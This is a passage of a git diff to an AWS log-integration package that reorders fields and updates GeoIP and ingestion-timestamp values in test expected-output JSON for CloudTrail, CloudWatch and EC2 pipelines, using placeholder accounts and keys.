"{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-09T16:36:17Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-10T00:34:02Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"DeleteVirtualMFADevice\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"serialNumber\":\"arn:aws:iam::0123456789012:mfa/Alice\"},\"responseElements\":null,\"requestID\":\"EXAMPLE-af91-4d1a-aaf2-EXAMPLE\",\"eventID\":\"EXAMPLE-f8e6-4d5f-8525-EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "iam.amazonaws.com", @@ -72,7 +69,10 @@ "name": "Other" }, "original": "signin.amazonaws.com" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-enable-mfa-device-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-enable-mfa-device-json.log-expected.json index 5a66ad5660b..9ac93b9661a 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-enable-mfa-device-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-enable-mfa-device-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-east-1", "account": { @@ -24,6 +17,10 @@ "Bob" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"false\",\"creationDate\":\"2019-11-27T15:07:22Z\"}}},\"eventTime\":\"2019-11-27T15:11:09Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"EnableMFADevice\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"console.amazonaws.com\",\"requestParameters\":{\"userName\":\"Bob\",\"serialNumber\":\"arn:aws:iam::0123456789012:mfa/Bob\"},\"responseElements\":null,\"requestID\":\"EXAMPLE-adea-490a-a806-EXAMPLE\",\"eventID\":\"EXAMPLE-3fdc-4b2a-9885-EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "iam.amazonaws.com", @@ -76,7 +73,10 @@ "name": "Other" }, "original": "console.amazonaws.com" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-start-logging-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-start-logging-json.log-expected.json index 3101de44c80..39c81506b77 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-start-logging-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-start-logging-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-west-2", "account": { @@ -23,6 +16,10 @@ "Alice" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"sessionIssuer\":{},\"webIdFederationData\":{},\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-08T15:12:16Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-08T15:30:25Z\",\"eventSource\":\"cloudtrail.amazonaws.com\",\"eventName\":\"StartLogging\",\"awsRegion\":\"us-west-2\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"name\":\"TEST-trail\"},\"responseElements\":null,\"requestID\":\"EXAMPLE-1c30-4f43-9763-EXAMPLE\",\"eventID\":\"EXAMPLE-aa78-4a84-a27f-EXAMPLE\",\"readOnly\":false,\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "cloudtrail.amazonaws.com", @@ -67,7 +64,10 @@ "name": "Other" }, "original": "signin.amazonaws.com" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-stop-logging-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-stop-logging-json.log-expected.json index 79d7439e301..47da079038e 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-stop-logging-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-stop-logging-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-west-2", "account": { @@ -23,6 +16,10 @@ "Alice" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"sessionIssuer\":{},\"webIdFederationData\":{},\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-09T16:36:17Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-09T16:46:16Z\",\"eventSource\":\"cloudtrail.amazonaws.com\",\"eventName\":\"StopLogging\",\"awsRegion\":\"us-west-2\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"name\":\"arn:aws:cloudtrail:us-west-2:0123456789012:trail/TEST-trail\"},\"responseElements\":null,\"requestID\":\"EXAMPLE-869f-4fec-86f9-EXAMPLE\",\"eventID\":\"EXAMPLE-8cc3-42db-9a0d-EXAMPLE\",\"readOnly\":false,\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "cloudtrail.amazonaws.com", @@ -67,7 +64,10 @@ "name": "Other" }, "original": "signin.amazonaws.com" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-access-key-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-access-key-json.log-expected.json index 0d57cca9cf0..5ae9bff9831 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-access-key-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-access-key-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-east-1", "account": { @@ -24,6 +17,10 @@ "Bob" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-10T14:38:30Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-10T15:01:23Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"UpdateAccessKey\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"status\":\"Inactive\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Bob\"},\"responseElements\":null,\"requestID\":\"EXAMPLE-7d0c-45f4-b25b-EXAMPLE\",\"eventID\":\"EXAMPLE-0ef0-42cd-8551-EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "iam.amazonaws.com", @@ -78,7 +75,10 @@ "name": "Other" }, "original": "signin.amazonaws.com" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-accout-password-policy-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-accout-password-policy-json.log-expected.json index cdc24c9d2f8..27ceafa8f30 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-accout-password-policy-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-accout-password-policy-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-east-1", "account": { @@ -23,6 +16,10 @@ "Alice" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-10T14:38:30Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-10T18:05:33Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"UpdateAccountPasswordPolicy\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"requireLowercaseCharacters\":true,\"requireSymbols\":true,\"requireNumbers\":true,\"minimumPasswordLength\":12,\"requireUppercaseCharacters\":true,\"allowUsersToChangePassword\":true},\"responseElements\":null,\"requestID\":\"EXAMPLE-5ebf-4bc3-a349-EXAMPLE\",\"eventID\":\"EXAMPLE-91f9-49f3-948c-EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "iam.amazonaws.com", @@ -77,7 +74,10 @@ "name": "Other" }, "original": "signin.amazonaws.com" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-login-profile-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-login-profile-json.log-expected.json index 54e213526e6..a4d54bfee51 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-login-profile-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-login-profile-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-east-1", "account": { @@ -24,6 +17,10 @@ "Bob" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-10T14:38:30Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-10T18:25:42Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"UpdateLoginProfile\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"userName\":\"Bob\"},\"responseElements\":null,\"requestID\":\"EXAMPLE-0dc6-447a-8859-EXAMPLE\",\"eventID\":\"EXAMPLE-c3b6-4498-b818-EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "iam.amazonaws.com", @@ -76,7 +73,10 @@ "name": "Other" }, "original": "signin.amazonaws.com" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-ssh-public-key-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-ssh-public-key-json.log-expected.json index c6ee9087cd3..913be656a4d 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-ssh-public-key-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-ssh-public-key-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-east-1", "account": { @@ -24,6 +17,10 @@ "Bob" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-10T14:38:30Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-10T16:06:54Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"UpdateSSHPublicKey\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"status\":\"Inactive\",\"userName\":\"Bob\",\"sSHPublicKeyId\":\"EXAMPLE_KEY_ID\"},\"responseElements\":null,\"requestID\":\"EXAMPLE-32f3-4a92-82e1-EXAMPLE\",\"eventID\":\"EXAMPLE-5c88-4652-9ee9-EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "iam.amazonaws.com", @@ -78,16 +75,12 @@ "name": "Other" }, "original": "signin.amazonaws.com" - } - }, - { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "cloud": { "region": "us-east-1", "account": { @@ -104,6 +97,10 @@ "Bob" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-10T14:38:30Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-10T16:06:54Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"UpdateSSHPublicKey\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"status\":\"Inactive\",\"userName\":\"Bob\",\"sSHPublicKeyId\":\"EXAMPLE_KEY_ID\"},\"responseElements\":null,\"requestID\":\"EXAMPLE-32f3-4a92-82e1-EXAMPLE\",\"eventID\":\"EXAMPLE-5c88-4652-9ee9-EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "iam.amazonaws.com", @@ -158,7 +155,10 @@ "name": "Other" }, "original": "signin.amazonaws.com" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-trail-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-trail-json.log-expected.json index 754605022ee..2b62a062c54 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-trail-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-trail-json.log-expected.json @@ -1,17 +1,32 @@ { "expected": [ { + "cloud": { + "region": "us-east-2", + "account": { + "id": "123456789012" + } + }, + "@timestamp": "2016-07-14T19:15:45.000Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "user": [ + "Alice" + ] + }, "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -23,24 +38,6 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, - "tags": [ - "preserve_original_event" - ], - "cloud": { - "region": "us-east-2", - "account": { - "id": "123456789012" - } - }, - "@timestamp": "2016-07-14T19:15:45.000Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "user": [ - "Alice" - ] - }, "event": { "original": "{\"eventVersion\":\"1.04\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EX_PRINCIPAL_ID\",\"arn\":\"arn:aws:iam::123456789012:user/Alice\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\"},\"eventTime\":\"2016-07-14T19:15:45Z\",\"eventSource\":\"cloudtrail.amazonaws.com\",\"eventName\":\"UpdateTrail\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"89.160.20.156\",\"userAgent\":\"aws-cli/1.10.32 Python/2.7.9 Windows/7 botocore/1.4.22\",\"errorCode\":\"TrailNotFoundException\",\"errorMessage\":\"Unknown trail: myTrail2 for the user: 123456789012\",\"requestParameters\":{\"name\":\"myTrail2\"},\"responseElements\":null,\"requestID\":\"5d40662a-49f7-11e6-97e4-dEXAMPLE\",\"eventID\":\"b7d4398e-b2f0-4faa-9c76-e2EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"123456789012\"}", "provider": "cloudtrail.amazonaws.com", @@ -85,16 +82,12 @@ "name": "Spider" }, "version": "1.10.32" - } - }, - { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "cloud": { "region": "us-west-2", "account": { @@ -110,6 +103,10 @@ "Alice" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"sessionIssuer\":{},\"webIdFederationData\":{},\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-08T15:12:16Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-08T20:58:45Z\",\"eventSource\":\"cloudtrail.amazonaws.com\",\"eventName\":\"UpdateTrail\",\"awsRegion\":\"us-west-2\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"name\":\"arn:aws:cloudtrail:us-west-2:0123456789012:trail/TEST-trail\",\"s3BucketName\":\"test-cloudtrail-bucket\",\"snsTopicName\":\"\",\"isMultiRegionTrail\":true,\"enableLogFileValidation\":false,\"kmsKeyId\":\"\"},\"responseElements\":{\"name\":\"TEST-trail\",\"s3BucketName\":\"test-cloudtrail-bucket\",\"snsTopicName\":\"\",\"snsTopicARN\":\"\",\"includeGlobalServiceEvents\":true,\"isMultiRegionTrail\":true,\"trailARN\":\"arn:aws:cloudtrail:us-west-2:0123456789012:trail/TEST-trail\",\"logFileValidationEnabled\":false,\"isOrganizationTrail\":false},\"requestID\":\"EXAMPLE-f3da-42d1-84f5-EXAMPLE\",\"eventID\":\"EXAMPLE-b5e9-4846-8407-EXAMPLE\",\"readOnly\":false,\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "cloudtrail.amazonaws.com", @@ -167,7 +164,10 @@ "name": "Other" }, "original": "signin.amazonaws.com" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-user-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-user-json.log-expected.json index e324600a271..b9fcec54dfa 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-user-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-user-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-east-1", "account": { @@ -25,6 +18,10 @@ "Robert" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EX_PRINCIPAL_ID\",\"arn\":\"arn:aws:iam::123456789012:user/Alice\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\"},\"eventTime\":\"2020-01-08T20:53:12Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"UpdateUser\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"aws-cli/1.16.310 Python/3.8.1 Darwin/18.7.0 botocore/1.13.46\",\"requestParameters\":{\"userName\":\"Bob\",\"newUserName\":\"Robert\"},\"responseElements\":null,\"requestID\":\"3a6b3260-739d-465e-9406-bcEXAMPLE\",\"eventID\":\"9150d546-3564-4262-8e62-110EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"123456789012\"}", "provider": "iam.amazonaws.com", @@ -77,7 +74,10 @@ "name": "Spider" }, "version": "1.16.310" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-upload-ssh-public-key-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-upload-ssh-public-key-json.log-expected.json index 63e08a3cb3f..9d41f0e7469 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-upload-ssh-public-key-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-upload-ssh-public-key-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-east-1", "account": { @@ -23,6 +16,10 @@ "Alice" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-10T14:38:30Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-10T16:06:40Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"UploadSSHPublicKey\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"sSHPublicKeyBody\":\"ssh-rsa AAAAdeadcodedeadcode Alice@localhost.domain\",\"userName\":\"Alice\"},\"responseElements\":{\"sSHPublicKey\":{\"fingerprint\":\"de:ad:c0:de:de:ad:c0:de:de:ad:c0:de:de:ad:c0:de\",\"status\":\"Active\",\"uploadDate\":\"Jan 10, 2020 4:06:40 PM\",\"userName\":\"Alice\",\"sSHPublicKeyId\":\"EXAMPLE_KEY_ID\",\"sSHPublicKeyBody\":\"ssh-rsa AAAAdeadcodedeadcode Alice@localhost.domain\"}},\"requestID\":\"EXAMPLE-44b9-41cd-90f2-EXAMPLE\",\"eventID\":\"EXAMPLE-9a9d-4da4-9998-EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "iam.amazonaws.com", @@ -81,7 +78,10 @@ "name": "Other" }, "original": "signin.amazonaws.com" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudwatch_logs/_dev/test/pipeline/test-cloudwatch-ec2.log-expected.json b/packages/aws/data_stream/cloudwatch_logs/_dev/test/pipeline/test-cloudwatch-ec2.log-expected.json index 8e4cce3a5fd..114c5c4a587 100644 --- a/packages/aws/data_stream/cloudwatch_logs/_dev/test/pipeline/test-cloudwatch-ec2.log-expected.json +++ b/packages/aws/data_stream/cloudwatch_logs/_dev/test/pipeline/test-cloudwatch-ec2.log-expected.json @@ -6,7 +6,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T16:11:58.525004600Z", + "ingested": "2021-12-14T14:35:28.992374624Z", "original": "2020-02-20T07:01:01.000Z Feb 20 07:01:01 ip-172-31-81-156 systemd: Stopping User Slice of root." }, "aws": { @@ -24,7 +24,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T16:11:58.525012700Z", + "ingested": "2021-12-14T14:35:28.992377584Z", "original": "2020-02-20T07:02:18.000Z Feb 20 07:02:18 ip-172-31-81-156 dhclient[3000]: XMT: Solicit on eth0, interval 125240ms." }, "aws": { @@ -42,7 +42,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T16:11:58.525017900Z", + "ingested": "2021-12-14T14:35:28.992378119Z", "original": "2020-02-20T07:02:37.000Z Feb 20 07:02:37 ip-172-31-81-156 dhclient[2898]: DHCPREQUEST on eth0 to 172.31.80.1 port 67 (xid=0x4575af22)" }, "aws": { @@ -60,7 +60,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T16:11:58.525022500Z", + "ingested": "2021-12-14T14:35:28.992378558Z", "original": "2020-02-20T07:02:37.000Z Feb 20 07:02:37 ip-172-31-81-156 dhclient[2898]: DHCPACK from 172.31.80.1 (xid=0x4575af22)" }, "aws": { @@ -78,7 +78,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T16:11:58.525027400Z", + "ingested": "2021-12-14T14:35:28.992378947Z", "original": "2020-02-20T07:02:37.000Z Feb 20 07:02:37 ip-172-31-81-156 dhclient[2898]: bound to 172.31.81.156 -- renewal in 1599 seconds." }, "aws": { @@ -96,7 +96,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T16:11:58.525032300Z", + "ingested": "2021-12-14T14:35:28.992379348Z", "original": "2020-02-20T07:02:37.000Z Feb 20 07:02:37 ip-172-31-81-156 ec2net: [get_meta] Trying to get http://169.254.169.254/latest/meta-data/network/interfaces/macs/12:e2:a9:95:8b:97/local-ipv4s" }, "aws": { diff --git a/packages/aws/data_stream/ec2_logs/_dev/test/pipeline/test-ec2.log-expected.json b/packages/aws/data_stream/ec2_logs/_dev/test/pipeline/test-ec2.log-expected.json index 4298569cb31..7872ea4914b 100644 --- a/packages/aws/data_stream/ec2_logs/_dev/test/pipeline/test-ec2.log-expected.json +++ b/packages/aws/data_stream/ec2_logs/_dev/test/pipeline/test-ec2.log-expected.json @@ -9,7 +9,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T16:11:58.684169900Z", + "ingested": "2021-12-14T14:35:29.134744491Z", "original": "2020-02-20T07:01:01.000Z Feb 20 07:01:01 ip-172-31-81-156 systemd: Stopping User Slice of root." }, "aws": { @@ -31,7 +31,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T16:11:58.684178100Z", + "ingested": 